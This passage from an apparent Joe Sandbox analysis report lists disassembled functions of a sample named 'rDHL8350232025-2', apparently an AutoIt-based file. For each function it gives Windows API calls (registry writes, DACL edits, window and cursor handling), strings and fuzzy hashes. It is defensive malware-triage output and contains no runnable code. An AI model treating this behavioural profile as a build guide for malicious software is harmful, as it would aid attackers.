                                                                                        • Part of subcall function 0004912D: GetAsyncKeyState.USER32(00000001), ref: 00049183
                                                                                        • Part of subcall function 0004912D: GetAsyncKeyState.USER32(00000002), ref: 0004919D
                                                                                      • SetTimer.USER32(00000000,00000000,00000028,000490FC), ref: 00048AA8
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                      • String ID: AutoIt v3 GUI
                                                                                      • API String ID: 1458621304-248962490
                                                                                      • Opcode ID: a9568d17f67f58973a9484d708b1544ea8f5ce0b3ad6449eb979445a26d06545
                                                                                      • Instruction ID: c7dd7c9e7d2c053a71ae1f9d1ce0314c0c1da3cc987d3d7e30c8f0ae1640681a
                                                                                      • Opcode Fuzzy Hash: a9568d17f67f58973a9484d708b1544ea8f5ce0b3ad6449eb979445a26d06545
                                                                                      • Instruction Fuzzy Hash: 7EB19E71A00209EFEB14DFA8CD45FAE3BB5FB48314F118229FA55A7290DB74E841CB55
                                                                                      Function 00090D8B Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 000910F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00091114
                                                                                        • Part of subcall function 000910F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00090B9B,?,?,?), ref: 00091120
                                                                                        • Part of subcall function 000910F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00090B9B,?,?,?), ref: 0009112F
                                                                                        • Part of subcall function 000910F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00090B9B,?,?,?), ref: 00091136
                                                                                        • Part of subcall function 000910F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0009114D
                                                                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00090DF5
                                                                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00090E29
                                                                                      • GetLengthSid.ADVAPI32(?), ref: 00090E40
                                                                                      • GetAce.ADVAPI32(?,00000000,?), ref: 00090E7A
                                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00090E96
                                                                                      • GetLengthSid.ADVAPI32(?), ref: 00090EAD
                                                                                      • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00090EB5
                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 00090EBC
                                                                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00090EDD
                                                                                      • CopySid.ADVAPI32(00000000), ref: 00090EE4
                                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00090F13
                                                                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00090F35
                                                                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00090F47
                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00090F6E
                                                                                      • HeapFree.KERNEL32(00000000), ref: 00090F75
                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00090F7E
                                                                                      • HeapFree.KERNEL32(00000000), ref: 00090F85
                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00090F8E
                                                                                      • HeapFree.KERNEL32(00000000), ref: 00090F95
                                                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00090FA1
                                                                                      • HeapFree.KERNEL32(00000000), ref: 00090FA8
                                                                                        • Part of subcall function 00091193: GetProcessHeap.KERNEL32(00000008,00090BB1,?,00000000,?,00090BB1,?), ref: 000911A1
                                                                                        • Part of subcall function 00091193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00090BB1,?), ref: 000911A8
                                                                                        • Part of subcall function 00091193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00090BB1,?), ref: 000911B7
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                      • String ID:
                                                                                      • API String ID: 4175595110-0
                                                                                      • Opcode ID: dfad3d31c0851d7322c708b073b44debc4897e4e52087dd29384a697bb5b9cf5
                                                                                      • Instruction ID: 8aa25acf5d8b18ff0e564f04a6c7e099aa5fbe87e547e95e3cfe678029aad0e0
                                                                                      • Opcode Fuzzy Hash: dfad3d31c0851d7322c708b073b44debc4897e4e52087dd29384a697bb5b9cf5
                                                                                      • Instruction Fuzzy Hash: 7171487290020AAFEF60DFA5DC48FEEBBB8FF05310F148125F919A6191D7759A05DB60
                                                                                      Function 000BC3B7 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 000BC4BD
                                                                                      • RegCreateKeyExW.ADVAPI32(?,?,00000000,000CCC08,00000000,?,00000000,?,?), ref: 000BC544
                                                                                      • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 000BC5A4
                                                                                      • _wcslen.LIBCMT ref: 000BC5F4
                                                                                      • _wcslen.LIBCMT ref: 000BC66F
                                                                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 000BC6B2
                                                                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 000BC7C1
                                                                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 000BC84D
                                                                                      • RegCloseKey.ADVAPI32(?), ref: 000BC881
                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 000BC88E
                                                                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 000BC960
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                                                                      • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                      • API String ID: 9721498-966354055
                                                                                      • Opcode ID: d9f706d85091b05e34fcaeaddabf0fd6797c9f4b23f02ffdbd992ccef25d366d
                                                                                      • Instruction ID: 9904c0e25ffc63980de01a3d473094635280f5632f521ee044f8dd8b57e3d3db
                                                                                      • Opcode Fuzzy Hash: d9f706d85091b05e34fcaeaddabf0fd6797c9f4b23f02ffdbd992ccef25d366d
                                                                                      • Instruction Fuzzy Hash: C1127A756046019FEB25DF14C881FAAB7E5EF88314F14885DF88A9B3A2DB71ED41CB81
                                                                                      Function 000C091E Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 372windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CharUpperBuffW.USER32(?,?), ref: 000C09C6
                                                                                      • _wcslen.LIBCMT ref: 000C0A01
                                                                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 000C0A54
                                                                                      • _wcslen.LIBCMT ref: 000C0A8A
                                                                                      • _wcslen.LIBCMT ref: 000C0B06
                                                                                      • _wcslen.LIBCMT ref: 000C0B81
                                                                                        • Part of subcall function 0004F9F2: _wcslen.LIBCMT ref: 0004F9FD
                                                                                        • Part of subcall function 00092BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00092BFA
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                      • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                      • API String ID: 1103490817-4258414348
                                                                                      • Opcode ID: 356c416cede4caf64e51dab3dcacc0a404b697dec4c79aca65f56383ca70e2c6
                                                                                      • Instruction ID: 96468690354b633e399678357ec144fed286cec19ee39adced017b4ab1ca3574
                                                                                      • Opcode Fuzzy Hash: 356c416cede4caf64e51dab3dcacc0a404b697dec4c79aca65f56383ca70e2c6
                                                                                      • Instruction Fuzzy Hash: 03E18771208701DFCB24DF28C450A6EB7E1BF98314F50895CF89A9B2A2DB31ED45CB82
                                                                                      Function 000BC998 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: _wcslen$BuffCharUpper
                                                                                      • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                      • API String ID: 1256254125-909552448
                                                                                      • Opcode ID: 29839f75ce315c017f5c7f54c18f234099c77645ce03043b740cb0ec78bcb072
                                                                                      • Instruction ID: cc50837bd8fa4fe2cc758f67efca6daf17908fa968abcabef797570c03e6a215
                                                                                      • Opcode Fuzzy Hash: 29839f75ce315c017f5c7f54c18f234099c77645ce03043b740cb0ec78bcb072
                                                                                      • Instruction Fuzzy Hash: 3971E33260412A8BEB20DE6CCD51DFF37D5ABA0758F250528FC56AB285EB35CD8493A1
                                                                                      Function 000C833C Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • _wcslen.LIBCMT ref: 000C835A
                                                                                      • _wcslen.LIBCMT ref: 000C836E
                                                                                      • _wcslen.LIBCMT ref: 000C8391
                                                                                      • _wcslen.LIBCMT ref: 000C83B4
                                                                                      • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 000C83F2
                                                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,000C5BF2), ref: 000C844E
                                                                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 000C8487
                                                                                      • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 000C84CA
                                                                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 000C8501
                                                                                      • FreeLibrary.KERNEL32(?), ref: 000C850D
                                                                                      • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 000C851D
                                                                                      • DestroyIcon.USER32(?,?,?,?,?,000C5BF2), ref: 000C852C
                                                                                      • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 000C8549
                                                                                      • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 000C8555
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                                                      • String ID: .dll$.exe$.icl
                                                                                      • API String ID: 799131459-1154884017
                                                                                      • Opcode ID: 3033e41d793cea387a0ba9e4b574ff0e6e7e984263a448e8d12e5ad43860c4e1
                                                                                      • Instruction ID: ceb61e8e9e86e896e5715c0995d8f867c6aa8afe864be9a70c69cf587b5ef2fd
                                                                                      • Opcode Fuzzy Hash: 3033e41d793cea387a0ba9e4b574ff0e6e7e984263a448e8d12e5ad43860c4e1
                                                                                      • Instruction Fuzzy Hash: 5D61D171940619BEEB18DF64CC45FFF77A8BB08711F10860AF915D60D1DBB4AA80DBA4
                                                                                      Function 00037778 Relevance: 28.3, APIs: 1, Strings: 15, Instructions: 273COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                      • API String ID: 0-1645009161
                                                                                      • Opcode ID: d8c69a7e42ab05de1d4e47dcb06873feded390959a60edf192432c3ad38ffd4c
                                                                                      • Instruction ID: 96503aedd970be57e21e7a00b84a75f541771ce2868925fed27a15c104ac1911
                                                                                      • Opcode Fuzzy Hash: d8c69a7e42ab05de1d4e47dcb06873feded390959a60edf192432c3ad38ffd4c
                                                                                      • Instruction Fuzzy Hash: 6C81D3B1A44605BBEB72AF60CC42FEF37A9AF15301F048025FD09AA193EBB4D915C795
                                                                                      Function 00095A1B Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • LoadIconW.USER32(00000063), ref: 00095A2E
                                                                                      • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00095A40
                                                                                      • SetWindowTextW.USER32(?,?), ref: 00095A57
                                                                                      • GetDlgItem.USER32(?,000003EA), ref: 00095A6C
                                                                                      • SetWindowTextW.USER32(00000000,?), ref: 00095A72
                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00095A82
                                                                                      • SetWindowTextW.USER32(00000000,?), ref: 00095A88
                                                                                      • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00095AA9
                                                                                      • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00095AC3
                                                                                      • GetWindowRect.USER32(?,?), ref: 00095ACC
                                                                                      • _wcslen.LIBCMT ref: 00095B33
                                                                                      • SetWindowTextW.USER32(?,?), ref: 00095B6F
                                                                                      • GetDesktopWindow.USER32 ref: 00095B75
                                                                                      • GetWindowRect.USER32(00000000), ref: 00095B7C
                                                                                      • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00095BD3
                                                                                      • GetClientRect.USER32(?,?), ref: 00095BE0
                                                                                      • PostMessageW.USER32(?,00000005,00000000,?), ref: 00095C05
                                                                                      • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00095C2F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                                                      • String ID:
                                                                                      • API String ID: 895679908-0
                                                                                      • Opcode ID: 93669f4a4ab738afc8838e1fd914c57a77eaa2159f54256c3f6d0775abe0fc62
                                                                                      • Instruction ID: 1b58f1f282af208c50752b52f9613cb2fa7c6c0e59fb3bee1cbc0b8961292a0b
                                                                                      • Opcode Fuzzy Hash: 93669f4a4ab738afc8838e1fd914c57a77eaa2159f54256c3f6d0775abe0fc62
                                                                                      • Instruction Fuzzy Hash: 27719D31900B09AFEF21DFA9CE85EAEBBF5FF48705F104518E586A25A0D774E940DB10
                                                                                      Function 000AFE0E Relevance: 27.1, APIs: 18, Instructions: 128COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • LoadCursorW.USER32(00000000,00007F89), ref: 000AFE27
                                                                                      • LoadCursorW.USER32(00000000,00007F8A), ref: 000AFE32
                                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 000AFE3D
                                                                                      • LoadCursorW.USER32(00000000,00007F03), ref: 000AFE48
                                                                                      • LoadCursorW.USER32(00000000,00007F8B), ref: 000AFE53
                                                                                      • LoadCursorW.USER32(00000000,00007F01), ref: 000AFE5E
                                                                                      • LoadCursorW.USER32(00000000,00007F81), ref: 000AFE69
                                                                                      • LoadCursorW.USER32(00000000,00007F88), ref: 000AFE74
                                                                                      • LoadCursorW.USER32(00000000,00007F80), ref: 000AFE7F
                                                                                      • LoadCursorW.USER32(00000000,00007F86), ref: 000AFE8A
                                                                                      • LoadCursorW.USER32(00000000,00007F83), ref: 000AFE95
                                                                                      • LoadCursorW.USER32(00000000,00007F85), ref: 000AFEA0
                                                                                      • LoadCursorW.USER32(00000000,00007F82), ref: 000AFEAB
                                                                                      • LoadCursorW.USER32(00000000,00007F84), ref: 000AFEB6
                                                                                      • LoadCursorW.USER32(00000000,00007F04), ref: 000AFEC1
                                                                                      • LoadCursorW.USER32(00000000,00007F02), ref: 000AFECC
                                                                                      • GetCursorInfo.USER32(?), ref: 000AFEDC
                                                                                      • GetLastError.KERNEL32 ref: 000AFF1E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Cursor$Load$ErrorInfoLast
                                                                                      • String ID:
                                                                                      • API String ID: 3215588206-0
                                                                                      • Opcode ID: c7319dd9e4f75ded928d1489d21e9faa73930442caf923dbdbba0fb4de391911
                                                                                      • Instruction ID: 5b7d263da5a2f3248efdc1c236e7754c0c57bae854aa9e1c8b6612308284e998
                                                                                      • Opcode Fuzzy Hash: c7319dd9e4f75ded928d1489d21e9faa73930442caf923dbdbba0fb4de391911
                                                                                      • Instruction Fuzzy Hash: 734153B0D0431A6EDB509FBA8C85C6EBFE8FF05354B50453AE11DEB281DB7899018F91
                                                                                      Function 000500C6 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 000500C6
                                                                                        • Part of subcall function 000500ED: InitializeCriticalSectionAndSpinCount.KERNEL32(0010070C,00000FA0,F55D1209,?,?,?,?,000723B3,000000FF), ref: 0005011C
                                                                                        • Part of subcall function 000500ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,000723B3,000000FF), ref: 00050127
                                                                                        • Part of subcall function 000500ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,000723B3,000000FF), ref: 00050138
                                                                                        • Part of subcall function 000500ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 0005014E
                                                                                        • Part of subcall function 000500ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 0005015C
                                                                                        • Part of subcall function 000500ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 0005016A
                                                                                        • Part of subcall function 000500ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00050195
                                                                                        • Part of subcall function 000500ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 000501A0
                                                                                      • ___scrt_fastfail.LIBCMT ref: 000500E7
                                                                                        • Part of subcall function 000500A3: __onexit.LIBCMT ref: 000500A9
                                                                                      Strings
                                                                                      • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00050122
                                                                                      • kernel32.dll, xrefs: 00050133
                                                                                      • WakeAllConditionVariable, xrefs: 00050162
                                                                                      • InitializeConditionVariable, xrefs: 00050148
                                                                                      • SleepConditionVariableCS, xrefs: 00050154
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                                                      • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                      • API String ID: 66158676-1714406822
                                                                                      • Opcode ID: ff2c684f5de50e788797c777db8796feb70df2f52562a5ceee2ba67bbd61253a
                                                                                      • Instruction ID: 438259a4b90587379473f0c1f868b7e4cee06e2c7af3a0c031e7d4f76f997313
                                                                                      • Opcode Fuzzy Hash: ff2c684f5de50e788797c777db8796feb70df2f52562a5ceee2ba67bbd61253a
                                                                                      • Instruction Fuzzy Hash: 93214672A41B016BF7115B64EC06F7F33D5EB05B62F04013AFD46A66D2DFB89C048A9A
                                                                                      Function 000930F7 Relevance: 24.9, APIs: 8, Strings: 6, Instructions: 400COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: _wcslen
                                                                                      • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                      • API String ID: 176396367-1603158881
                                                                                      • Opcode ID: 548552615f32adccbf7a4d77a95364185242cd4f90822221bebc20ebe1ec2a9a
                                                                                      • Instruction ID: d9c113e501bed63093dcfc18b3b8c2fc00c6abb5e29ecc3af2bc6900faf9c858
                                                                                      • Opcode Fuzzy Hash: 548552615f32adccbf7a4d77a95364185242cd4f90822221bebc20ebe1ec2a9a
                                                                                      • Instruction Fuzzy Hash: C3E1D332A00516ABCF689FA8C8417FEBBF4BF44710F558129E556A7241DB30AF85AF90
                                                                                      Function 000A44C0 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CharLowerBuffW.USER32(00000000,00000000,000CCC08), ref: 000A4527
                                                                                      • _wcslen.LIBCMT ref: 000A453B
                                                                                      • _wcslen.LIBCMT ref: 000A4599
                                                                                      • _wcslen.LIBCMT ref: 000A45F4
